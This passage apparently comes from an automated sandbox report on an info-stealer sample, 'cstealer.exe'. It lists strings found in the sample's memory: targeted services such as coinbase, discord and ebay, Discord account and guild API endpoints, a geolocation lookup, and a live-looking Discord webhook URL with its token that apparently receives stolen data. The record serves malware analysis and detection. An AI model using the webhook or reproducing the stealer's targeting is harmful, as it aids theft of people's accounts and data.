cstealer.exe, 00000009.00000003.2216090546.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290594631.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2321140918.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://coinbase.com)z
                                Source: cstealer.exe, 00000003.00000002.2671730030.00000271DA1A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2339606030.0000020102E30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://crunchyroll.com)
                                Source: cstealer.exe, 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2648903466.00000271DA037000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2539385237.00000271DA035000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2208622315.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2211211396.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219438369.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2216090546.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290594631.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2321140918.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crunchyroll.com)z
                                Source: cstealer.exe, 00000003.00000002.2671730030.00000271DA1A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2339606030.0000020102E30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com)
                                Source: cstealer.exe, 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2648903466.00000271DA037000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2539385237.00000271DA035000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2208622315.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2211211396.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219438369.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2216090546.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290594631.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2321140918.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.com)z
                                Source: cstealer.exe, 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2648903466.00000271DA037000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2539385237.00000271DA035000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2671730030.00000271DA1A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2208622315.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2339606030.0000020102E30000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2211211396.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219438369.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2216090546.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290594631.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2321140918.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/users/
                                Source: cstealer.exe, 00000003.00000002.2671730030.00000271DA1A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2339606030.0000020102E30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v6/guilds/
                                Source: cstealer.exe, 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2648903466.00000271DA037000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2539385237.00000271DA035000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2208622315.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2211211396.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219438369.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2216090546.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290594631.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2321140918.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v6/guilds/r
                                Source: cstealer.exe, 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2648903466.00000271DA037000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2539385237.00000271DA035000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2671730030.00000271DA1A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2208622315.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2339606030.0000020102E30000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2211211396.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219438369.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2216090546.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290594631.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2321140918.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v6/users/
                                Source: cstealer.exe, 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/users/
                                Source: cstealer.exe, 00000003.00000002.2632028088.00000271D9EA0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2315471256.0000020102B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1237846362008195163/ZDvWlv-CgO7k2ie63UbKQjPqKJJV4I85cFC7RbPTP5wjqCU
                                Source: cstealer.exe, 00000003.00000002.2671730030.00000271DA1A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2339606030.0000020102E30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.gg/
                                Source: cstealer.exe, 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2648903466.00000271DA037000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2539385237.00000271DA035000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2208622315.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2211211396.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219438369.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2216090546.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290594631.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2321140918.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.gg/r
                                Source: cstealer.exe, 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2648903466.00000271DA037000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2539385237.00000271DA035000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2671730030.00000271DA1A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2208622315.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2339606030.0000020102E30000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2211211396.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219438369.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2216090546.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290594631.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2321140918.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.gift/
                                Source: cstealer.exe, 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2648903466.00000271DA037000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2539385237.00000271DA035000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2671730030.00000271DA1A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2208622315.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2339606030.0000020102E30000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2211211396.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219438369.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2216090546.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290594631.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2321140918.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discordapp.com/api/v6/users/
                                Source: cstealer.exe, 00000003.00000002.2671730030.00000271DA1A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2339606030.0000020102E30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://disney.com)
                                Source: cstealer.exe, 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2648903466.00000271DA037000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2539385237.00000271DA035000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2208622315.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2211211396.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219438369.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2216090546.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290594631.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2321140918.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://disney.com)z$
                                Source: cstealer.exe, 00000003.00000003.2183488711.00000271DA11F000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2455429360.00000271DA12B000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2179233556.00000271DA11F000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2473409999.00000271DA141000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2517647465.00000271DA142000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2173830510.00000271DA10E000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2215320232.0000020102DEC000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2337980032.0000020102E0A000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2212604471.0000020102DEE000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2287998421.0000020102DFD000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2289505736.0000020102E05000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102DD1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218139223.0000020102DD1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2221688107.0000020102DD1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219861394.0000020102DD1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102DD1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2287046856.0000020102DD2000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2220789143.0000020102DD1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2282192132.0000020102DD1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2213329573.0000020102DEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64
                                Source: cstealer.exe, 00000003.00000002.2671730030.00000271DA1A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2339606030.0000020102E30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ebay.com)
                                Source: cstealer.exe, 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2648903466.00000271DA037000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2539385237.00000271DA035000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2208622315.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2211211396.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219438369.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2216090546.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290594631.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2321140918.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ebay.com)z$
                                Source: cstealer.exe, 00000003.00000002.2671730030.00000271DA1A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2339606030.0000020102E30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://epicgames.com)
                                Source: cstealer.exe, 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://epicgames.com)z
                                Source: cstealer.exe, 00000003.00000002.2671730030.00000271DA1A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2339606030.0000020102E30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://expressvpn.com)
                                Source: cstealer.exe, 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2648903466.00000271DA037000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2539385237.00000271DA035000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2208622315.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2211211396.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219438369.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2216090546.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290594631.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2321140918.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://expressvpn.com)z
                                Source: cstealer.exe, 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://facebook.c
                                Source: cstealer.exe, 00000003.00000003.2178442107.00000271D9E64000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2675138815.00000271DA2A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2177316384.00000271D9E57000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2342208883.0000020102F30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://foss.heptapod.net/pypy/pypy/-/issues/3539
                                Source: cstealer.exe, 00000003.00000002.2671730030.00000271DA1A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2339606030.0000020102E30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://geolocation-db.com/jsonp/
                                Source: cstealer.exe, 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2648903466.00000271DA037000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2539385237.00000271DA035000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2208622315.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2211211396.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219438369.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2216090546.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290594631.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2321140918.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://geolocation-db.com/jsonp/z
                                Source: cstealer.exe, 00000003.00000002.2671730030.00000271DA1A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2339606030.0000020102E30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com)
                                Source: cstealer.exe, 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2648903466.00000271DA037000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2539385237.00000271DA035000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2208622315.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2211211396.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219438369.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2216090546.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290594631.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2321140918.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com)z
